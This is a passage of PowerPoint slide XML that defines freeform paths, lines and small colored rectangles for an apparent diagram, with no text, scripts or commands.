                <a:lnTo>
                  <a:pt x="32" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Line 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382920" y="4027320"/>
            <a:ext cx="1440" cy="65160"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Line 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900240" y="4027320"/>
            <a:ext cx="1800" cy="65160"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="CustomShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382920" y="4027320"/>
            <a:ext cx="510840" cy="63000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="CustomShape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3675240" y="4054320"/>
            <a:ext cx="4104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3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272" name="CustomShape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378240" y="3951360"/>
            <a:ext cx="515520" cy="122040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t"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close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="CustomShape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378240" y="3951360"/>
            <a:ext cx="515520" cy="122040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="325" h="77">
                <a:moveTo>
                  <a:pt x="163" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="147" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="310" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="307" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="14400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Line 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3501720" y="3979800"/>
            <a:ext cx="92160" cy="14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75" name="Line 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678120" y="4049640"/>
            <a:ext cx="81000" cy="14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76" name="Line 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3587400" y="3979800"/>
            <a:ext cx="93960" cy="698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77" name="Line 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3501720" y="4047840"/>
            <a:ext cx="92160" cy="180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78" name="Line 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678120" y="3978000"/>
            <a:ext cx="81000" cy="180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79" name="Line 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3587400" y="3978000"/>
            <a:ext cx="93960" cy="698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280" name="CustomShape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008680" y="4919760"/>
            <a:ext cx="132840" cy="899640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E0E0E0"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="CustomShape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5003640" y="4919760"/>
            <a:ext cx="136080" cy="101160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="86" h="64">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="86" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:ln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282" name="CustomShape 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008680" y="5051520"/>
            <a:ext cx="6480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3" name="CustomShape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076720" y="5049720"/>
            <a:ext cx="68040" cy="5364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4" name="CustomShape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5041800" y="4991040"/>
            <a:ext cx="68040" cy="504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285" name="CustomShape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5111640" y="4991040"/>
            <a:ext cx="3312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6" name="CustomShape 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5002200" y="4991040"/>
            <a:ext cx="3456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7" name="CustomShape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="4929120"/>
            <a:ext cx="68040" cy="5364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8" name="CustomShape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078520" y="4930920"/>
            <a:ext cx="680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89" name="CustomShape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5170320"/>
            <a:ext cx="6300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0" name="CustomShape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076720" y="5170320"/>
            <a:ext cx="662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1" name="CustomShape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5041800" y="5110200"/>
            <a:ext cx="66240" cy="504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292" name="CustomShape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110200" y="5110200"/>
            <a:ext cx="3456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3" name="CustomShape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008680" y="5110200"/>
            <a:ext cx="2664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4" name="CustomShape 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5286240"/>
            <a:ext cx="6300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5" name="CustomShape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076720" y="5286240"/>
            <a:ext cx="662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6" name="CustomShape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5041800" y="5227560"/>
            <a:ext cx="6624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7" name="CustomShape 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110200" y="5227560"/>
            <a:ext cx="34560" cy="504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298" name="CustomShape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5227560"/>
            <a:ext cx="2808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299" name="CustomShape 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5407200"/>
            <a:ext cx="6300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0" name="CustomShape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076720" y="5407200"/>
            <a:ext cx="662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1" name="CustomShape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5040360" y="5346720"/>
            <a:ext cx="68040" cy="522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302" name="CustomShape 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110200" y="5346720"/>
            <a:ext cx="3312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3" name="CustomShape 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008680" y="5346720"/>
            <a:ext cx="266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4" name="CustomShape 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5526000"/>
            <a:ext cx="6624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5" name="CustomShape 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076720" y="5524560"/>
            <a:ext cx="68040" cy="5364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6" name="CustomShape 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5041800" y="5465880"/>
            <a:ext cx="6804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7" name="CustomShape 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5111640" y="5465880"/>
            <a:ext cx="3312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08" name="CustomShape 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5645160"/>
            <a:ext cx="63000" cy="522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309" name="CustomShape 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076720" y="5645160"/>
            <a:ext cx="662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0" name="CustomShape 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5041800" y="5586480"/>
            <a:ext cx="66240" cy="4896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311" name="CustomShape 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110200" y="5583240"/>
            <a:ext cx="3456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2" name="CustomShape 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008680" y="5583240"/>
            <a:ext cx="26640" cy="522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3" name="CustomShape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5762520"/>
            <a:ext cx="6300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4" name="CustomShape 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5076720" y="5762520"/>
            <a:ext cx="66240" cy="50400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="400000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="CustomShape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5041800" y="5702400"/>
            <a:ext cx="66240" cy="504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316" name="CustomShape 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
